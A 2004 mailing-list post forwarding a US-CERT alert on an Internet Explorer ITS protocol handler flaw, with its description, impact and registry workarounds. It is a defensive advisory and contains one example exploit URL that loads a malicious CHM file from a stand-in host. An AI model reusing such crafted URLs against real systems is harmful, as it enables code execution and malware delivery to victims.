[thelist] Fwd: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler

Anthony Baratta anthony at baratta.com
Thu Apr 8 17:36:04 CDT 2004


New IE Security Hole - no patch currently available, review the RegHack 
explained below. Watch out for HTML formated emails and strange web sites.

Big Note: CERT is saying this might be exploitable via a non-IE browser!!

>From: CERT Advisory <cert-advisory at cert.org>
>To: cert-advisory at cert.org
>Organization: CERT(R) Coordination Center - +1 412-268-7090
>Subject: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability 
>in Internet Explorer ITS Protocol Handler
>Hash: SHA1
>Vulnerability in Internet Explorer ITS Protocol Handler
>    Original release date: April 8, 2004
>    Last revised: --
>    Source: US-CERT
>Systems Affected
>      * Microsoft Windows systems running Internet Explorer
>    A cross-domain scripting vulnerability in Microsoft Internet Explorer
>    (IE) could allow an attacker to execute arbitrary code with the
>    privileges of the user running IE. The attacker could also read and
>    manipulate data on web sites in other domains or zones.
>I. Description
>    There is a cross-domain scripting vulnerability in the way ITS
>    protocol handlers determine the security domain of an HTML component
>    stored in a Compiled HTML Help (CHM) file. The HTML Help system
>    "...uses the underlying components of Microsoft Internet Explorer to
>    display help content. It supports HTML, ActiveX, Java, [and] scripting
>    languages (JScript, and Microsoft Visual Basic Scripting Edition)."
>    CHM files use the InfoTech Storage (ITS) format to store components
>    such as HTML files, graphic files, and ActiveX objects. IE provides
>    several protocol handlers that can access ITS files and individual CHM
>    components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
>    the ability to access parts of MIME Encapsulation of Aggregate HTML
>    Documents (MHTML) using the mhtml: protocol handler.
>    When IE references an inaccessible or non-existent MHTML file using
>    the ITS and mhtml: protocols, the ITS protocol handlers can access a
>    CHM file from an alternate source. IE incorrectly treats the CHM file
>    as if it were in the same domain as the unavailable MHTML file. Using
>    a specially crafted URL, an attacker can cause arbitrary script in a
>    CHM file to be executed in a different domain, violating the
>    cross-domain security model.
>    Any programs that use the WebBrowser ActiveX control or the IE HTML
>    rendering engine (MSHTML) may be affected by this vulnerability.
>    Internet Explorer, Outlook, and Outlook Express are all examples of
>    such programs. Any programs, including other web browsers, that use
>    the IE protocol handlers (URL monikers) could function as attack
>    vectors. Also, due to the way that IE determines MIME types, HTML and
>    CHM files may not have the expected file name extensions (.htm/.html
>    and .chm respectively).
>    NOTE: Using an alternate web browser may not mitigate this
>    vulnerability. It may be possible for a web browser other than IE on a
>    Windows system to invoke IE to handle ITS protocol URLs.
>    US-CERT is tracking this issue as VU#323070. This reference number
>    corresponds to CVE candidate CAN-2004-0380.
>II. Impact
>    By convincing a victim to view an HTML document such as a web page or
>    HTML email message, an attacker could execute script in a different
>    security domain than the one containing the attacker's document. By
>    causing script to be run in the Local Machine Zone, the attacker could
>    execute arbitrary code with the privileges of the user running IE. The
>    attacker could also read or modify data in other web sites (including
>    reading cookies or content and modifying or creating content).
>    Publicly available exploit code exists for this vulnerability. US-CERT
>    has monitored incident reports that indicate that this vulnerability
>    is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
>    BloodHound.Exploit.6 are some example of malicious code that exploit
>    this vulnerability. It is important to note that any arbitrary
>    executable payload could be delivered via this vulnerability, and
>    different anti-virus vendors may identify malicious code with
>    different names.
>    A malicious web site or email message may contain HTML similar to the
>    following:
>      ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
>      oit_chm::exploit_html
>      (This URL is intentionally modified to avoid detection by
>      anti-virus software.)
>    In this example, HTML and script in exploit.html will be executed in
>    the security context of the Local Machine Zone. It is common practice
>    for exploit.html to either contain or download an executable payload
>    such as a backdoor, trojan horse, virus, bot, or other malicious code.
>    Note that it is possible to encode a URL in an attempt to bypass HTTP
>    content inspection or anti-virus software.
>III. Solution
>    Currently, there is no complete solution for this vulnerability. Until
>    a patch is available, consider the workarounds listed below.
>    Disable ITS protocol handlers
>    Disabling ITS protocol handlers appears to prevent exploitation of
>    this vulnerability. Delete or rename the following registry keys:
>      HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
>      ss,its,mk}
>    Disabling these protocol handlers will significantly reduce the
>    functionality of the Windows Help system and may have other unintended
>    consequences. Plan to undo these changes after patches have been
>    tested and installed. Follow good Internet security practices
>    These recommended security practices will help to reduce exposure to
>    attacks and mitigate the impact of cross-domain vulnerabilities.
>      * Disable Active scripting and ActiveX controls
>        NOTE: Disabling Active scripting and ActiveX controls will not
>        prevent the exploitation of this vulnerability.
>        Disabling Active scripting and ActiveX controls in the Internet
>        and Local Machine Zones may stop certain types of attacks and will
>        prevent exploitation of different cross-domain vulnerabilities.
>        Disable Active scripting and ActiveX controls in any zones used to
>        read HTML email.
>        Disabling Active scripting and ActiveX controls in the Local
>        Machine Zone will prevent malicious code that requires Active
>        scripting and ActiveX controls from running. Changing these
>        settings may reduce the functionality of scripts, applets, Windows
>        components, or other applications. See Microsoft Knowledge Base
>        Article 833633 for detailed information about security settings
>        for the Local Machine Zone. Note that Service Pack 2 for Windows
>        XP includes these changes.
>      * Do not follow unsolicited links
>        Do not click on unsolicited URLs received in email, instant
>        messages, web forums, or Internet relay chat (IRC) channels.
>      * Maintain updated anti-virus software
>        Anti-virus software with updated virus definitions may identify
>        and prevent some exploit attempts. Variations of exploits or
>        attack vectors may not be detected. Do not rely solely on
>        anti-virus software to defend against this vulnerability. More
>        information about viruses and anti-virus vendors is available on
>        the US-CERT Computer Virus Resources page.
>Appendix B. References
>      * Vulnerability Note VU#323070 -
>        <http://www.kb.cert.org/vuls/id/323070>
>      * US-CERT Computer Virus Resources -
>        <http://www.us-cert.gov/other_sources/viruses.html>
>      * CVE CAN-2004-0380 -
>        <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
>      * Introduction to URL Security Zones -
>        <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
>        ew.asp>
>      * About Cross-Frame Scripting and Security -
>        <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
>        urity.asp>
>      * MIME Type Determination in Internet Explorer -
>        <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
>        pendix_a.asp>
>      * URL Monikers -
>        <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
>        p>
>      * Asynchronous Pluggable Protocols -
>        <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
>        .asp>
>      * Microsoft HTML Help 1.4 SDK -
>        <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
>        rt.asp>
>      * Microsoft Knowledge Base Article 182569 -
>        <http://support.microsoft.com/default.aspx?scid=182569>
>      * Microsoft Knowledge Base Article 174360 -
>        <http://support.microsoft.com/default.aspx?scid=174360>
>      * Microsoft Knowledge Base Article 833633 -
>        <http://support.microsoft.com/default.aspx?scid=833633>
>      * Windows XP Service Pack 2 Technical Preview -
>        <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
>        mspx >
>      * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
>      _________________________________________________________________
>    This vulnerability was reported by Thor Larholm.
>      _________________________________________________________________
>    Feedback can be directed to the author: Art Manion.
>      _________________________________________________________________
>    Copyright 2004 Carnegie Mellon University.
>    Terms of use:
>         <http://www.us-cert.gov/legal.html>
>    Revision History
>    April 8, 2004: Initial release
>Version: GnuPG v1.2.1 (GNU/Linux)

More information about the thelist mailing list